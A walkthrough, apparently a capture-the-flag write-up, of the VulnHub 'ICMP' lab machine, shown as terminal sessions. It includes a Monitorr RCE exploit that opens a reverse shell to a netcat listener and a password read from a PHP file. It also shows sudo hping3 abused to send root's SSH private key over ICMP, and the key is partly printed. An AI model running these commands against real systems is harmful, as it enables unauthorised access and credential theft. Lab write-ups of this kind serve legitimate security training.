https://www.vulnhub.com/entry/icmp-1,633/
Scan ports, find 22 and 80.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ nmap -sV -sC -p- 192.168.56.81 -oN ports.log ... PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian))
Scan port 80.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ gobuster dir -u http://192.168.56.81 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 400,403,404,500 --wildcard /index.php (Status: 302) /mon (Status: 301)
Open port 80 in firefox, it's a system monitor program named "Monitorr". Searchspolit show it may has vulnerability.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ searchsploit monitorr ----------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------- --------------------------------- Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py Monitorr 1.7.6m - Remote Code Execution (Unauthentic | php/webapps/48980.py ----------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
Use 48980.py to get reverse shell.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ python3 48980.py http://192.168.56.81/mon 192.168.56.150 1234 ------------------------------------------------------------------------------ ┌──(kali㉿mykali)-[~/Documents/icmp] └─$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.56.150] from (UNKNOWN) [192.168.56.81] 44222 bash: cannot set terminal process group (498): Inappropriate ioctl for devicebash: no job control in this shell www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@icmp:/var/www/html/mon/assets/data/usrimg$
In fox's home folder, find a reminder txt file, and a "devel" folder we can not enter.
www-data@icmp:/home/fox$ cd /home/fox cd /home/fox www-data@icmp:/home/fox$ ls -la ls -la total 20 drwxr-xr-x 3 root root 4096 Dec 3 16:08 . drwxr-xr-x 3 root root 4096 Dec 3 16:04 .. lrwxrwxrwx 1 root root 9 Dec 3 16:08 .bash_history -> /dev/null drwx--x--x 2 fox fox 4096 Dec 3 16:05 devel -rw-r--r-- 1 fox fox 33 Dec 3 16:08 local.txt -rw-r--r-- 1 root root 78 Dec 3 16:08 reminder www-data@icmp:/home/fox$ cat reminder cat reminder crypt with crypt.php: done, it works work on decrypt with crypt.php: howto?!? www-data@icmp:/home/fox$
Through the note, we guess maybe there is a file named crypt.php in devel.
www-data@icmp:/home/fox$ ls -la devel/crypt.php ls -la devel/crypt.php -rw-r--r-- 1 fox fox 56 Dec 3 16:05 devel/crypt.php www-data@icmp:/home/fox$ cat devel/crypt.php cat devel/crypt.php <?php echo crypt('.............','da'); ?>
Now we can try to log in ssh as fox with the password. Then check sudo.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ ssh fox@192.168.56.81 1 ⚙ fox@192.168.56.81's password: Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 ... Last login: Fri Mar 12 05:43:09 2021 from 192.168.56.150 $ sudo -l [sudo] password for fox: Matching Defaults entries for fox on icmp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User fox may run the following commands on icmp: (root) /usr/sbin/hping3 --icmp * (root) /usr/bin/killall hping3 $
Now we need to add two terminal at victim's machine. One terminal send and one terminal receive.
Here is the first terminal. Press Ctrl+C when second terminal receive all private key data.
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes [main] memlockall(): Success Warning: can't disable memory paging! len=128 ip=127.0.0.1 ttl=64 id=5102 icmp_seq=0 rtt=6.6 ms ... len=128 ip=127.0.0.1 ttl=64 id=8754 icmp_seq=30 rtt=2.6 ms ^C --- 127.0.0.1 hping statistic --- 31 packets transmitted, 31 packets received, 0% packet loss round-trip min/avg/max = 0.6/4.8/8.1 ms
Here is the second terminal.
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe Warning: Unable to guess the output interface hping3 listen mode [main] memlockall(): Success Warning: can't disable memory paging! -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAqcCz/pKzjVNZi9zdKJDkvhMhY8lOb2Qth8e/3bLJ/ssgmRLoJXAQ ... qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw== -----END OPENSSH PRIVATE KEY-----
Now we can ssh in as root.
┌──(kali㉿mykali)-[~/Documents/icmp] └─$ ssh root@192.168.56.81 -i id_rsa 130 ⨯ 1 ⚙ Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Mar 12 05:55:54 2021 from 192.168.56.150 root@icmp:~# id;hostname uid=0(root) gid=0(root) groups=0(root) icmp